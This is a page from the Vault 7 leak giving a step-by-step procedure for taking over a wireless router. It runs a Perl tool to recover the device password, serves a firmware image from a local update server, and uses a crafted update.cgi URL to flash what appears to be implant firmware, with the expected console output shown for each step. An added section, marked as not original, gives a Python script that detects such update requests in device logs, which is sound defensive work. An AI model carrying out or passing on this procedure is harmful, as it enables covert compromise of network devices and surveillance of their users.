Vault 7: Projects

1. Open a cygwin shell, cd to <HOME>/<PACKAGE>, and run:

       perl cisc0wn-2.00.08.pl <DEVICE IP>

   In about 15 seconds, the program should return the device's password.
   NOTE: the most common case of failure here is running the program against
   a device that is already running a CB firmware. See the
   "TROUBLESHOOTING AND DEVICE RECOVERY" section for how to get out of this
   situation.
2. From the same cygwin shell, run the following:

       ./update_server.exe 2313 <SQSH_FILE>

   where <SQSH_FILE> is the .sqsh image to deploy to the device. NOTE that
   each <SQSH_FILE> has a corresponding flytrap.config.<SQSH_FILE> that shows
   its configuration. Be sure to specify the appropriate file.
   The update_server.exe program should report:

       Image Size: nnnnnnnn
       Waiting for client connection
3. Open a browser (IE) and go to the following url:

       http://<DEVICE IP>/update.cgi?<WIRELESS CLIENT IP>+2313

   For example, if the <DEVICE IP> is 192.168.1.1, and the
   <WIRELESS CLIENT IP> is 192.168.1.100, go to:

       http://192.168.1.1/update.cgi?192.168.1.100+2313

   An authentication box should pop up (unless you have previously
   authenticated). Enter the password from step 1, and leave the username
   field blank.
4. The cygwin shell from step 2 should nearly immediately report:

       Connection Accepted
       bytesSent nnnnnnnn
       Sent nnnnnnnn bytes

   At this point the <SQSH_FILE> has been uploaded to the device's RAM, and
   writing to flash has begun. Note that at this point the operator can leave.
5. After about 50 seconds, assuming a constant connection, the cygwin shell
   from step 2 should report:

       Update succeeded
       Waiting for client connection

   At this point, the <SQSH_FILE> has been written to flash, and the device
   is going to reboot.
   If the operator loses connection at some point, the cygwin shell will report:

       Failed to receive status
       Waiting for client connection

   and the device will not be able to report the "Update succeeded" status.
   As long as the cygwin shell has reported "Connection Accepted" as in step 4,
   and the device is not power-cycled during the 50 seconds of flash writing,
   the upgrade should succeed. See the "TROUBLESHOOTING AND DEVICE RECOVERY"
   section if any problems arise.
6. The device takes 30-60 seconds to reboot -- the operator should see the
   wireless network go down for this period of time.
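The procedure above leaves one host-side indicator a network owner can look for in the device's own web-server log: a request to update.cgi whose query string is an IP address and a TCP port, which tells the device where to pull a firmware image from. The following is an added example, not part of the original document or of the tooling it describes. It assumes the device writes access logs in Common Log Format (an assumption; the sample lines below are constructed) and returns every successful update.cgi request of that shape, noting whether the host the image is pulled from is the same client that made the request.

```python
"""Flag web-server requests matching the update.cgi?<ip>+<port> pattern
described in the procedure above.  Added example, not from the original
document.  Log format (Common Log Format) and sample lines are constructed."""

import re
from typing import Dict, List, Optional

# Common Log Format: host ident user [time] "request" status size
CLF_RE = re.compile(
    r'^(?P<src>\S+) \S+ (?P<user>\S+) \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)$'
)

# Path and query exactly as the procedure forms them: /update.cgi?<ip>+<port>
UPDATE_RE = re.compile(
    r'^/update\.cgi\?(?P<pull_host>\d{1,3}(?:\.\d{1,3}){3})\+(?P<pull_port>\d{1,5})$'
)

# Constructed sample log (addresses mirror the 192.168.1.x example in the procedure)
SAMPLE_LOG = """\
192.168.1.100 - - [01/Jan/2010:12:00:00 +0000] "GET /index.htm HTTP/1.1" 200 5120
192.168.1.100 - - [01/Jan/2010:12:00:05 +0000] "GET /update.cgi?192.168.1.100+2313 HTTP/1.1" 401 0
192.168.1.100 - - [01/Jan/2010:12:00:09 +0000] "GET /update.cgi?192.168.1.100+2313 HTTP/1.1" 200 312
192.168.1.101 - - [01/Jan/2010:12:01:00 +0000] "GET /status.cgi HTTP/1.1" 200 890
this line is not in common log format
"""


def parse_clf(line: str) -> Optional[Dict[str, str]]:
    """Return the fields of one CLF line, or None if the line does not parse."""
    m = CLF_RE.match(line.strip())
    return m.groupdict() if m else None


def find_update_requests(log_text: str) -> List[Dict[str, str]]:
    """Return one record per successful request shaped like update.cgi?<ip>+<port>.

    The device fetches the image from pull_host:pull_port, so a pull host that
    is an ordinary wireless client rather than an update server the owner
    controls is the detail worth reviewing.  Requests that did not return 2xx
    are skipped: a 401 means the password prompt was not yet satisfied.
    """
    hits: List[Dict[str, str]] = []
    for line in log_text.splitlines():
        fields = parse_clf(line)
        if fields is None or fields["method"] != "GET":
            continue
        um = UPDATE_RE.match(fields["path"])
        if um is None or not fields["status"].startswith("2"):
            continue
        hits.append({
            "time": fields["time"],
            "src": fields["src"],
            "pull_host": um["pull_host"],
            "pull_port": um["pull_port"],
            "user": fields["user"],  # logged user field; the procedure leaves the username blank
            "src_is_pull_host": str(fields["src"] == um["pull_host"]),
        })
    return hits


if __name__ == "__main__":
    for hit in find_update_requests(SAMPLE_LOG):
        print(hit)
```

The match is deliberately narrow (dotted-quad plus a port, nothing else in the query), because a vendor's own update path may use the same CGI name with a different query shape; a hit is a reason to compare the device's running firmware against a known-good image, not proof on its own.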
TROUBLESHOOTING AND DEVICE RECOVERY: